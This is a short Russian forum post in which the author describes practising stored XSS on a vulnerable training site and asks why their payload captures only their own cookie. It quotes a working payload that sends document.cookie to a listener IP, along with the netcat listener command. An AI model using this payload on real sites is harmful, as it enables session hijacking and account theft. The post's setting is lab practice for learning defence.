Я хочу лучше понять XSS, чтобы помогать своим друзьям, которые защищают малый бизнес. Поэтому я вышел в интернет и использовал один из тех уязвимых сайтов, которые используют Kali Linux, для практики XSS.
Итак, я нашел хранимую XSS-уязвимость в одной из проблем и хорошо использовал ее с помощью следующего кода: <script>image = new Image(); image.src='http://192.168.32.15:80/?'+document.cookie;</script> на странице о нас, где вы можете вставить комментарий.
Затем на терминале Linux я сделал nc -l -p 80, чтобы прослушать трафик, но единственный файл cookie, который я получаю, это когда я нажимаю на страницу. На сайте есть еще один или два пользователя, и, по сути, я пытаюсь получить их куки, но, похоже, не получаю их на своем терминале.
Любая помощь будет оценена.
Спасибо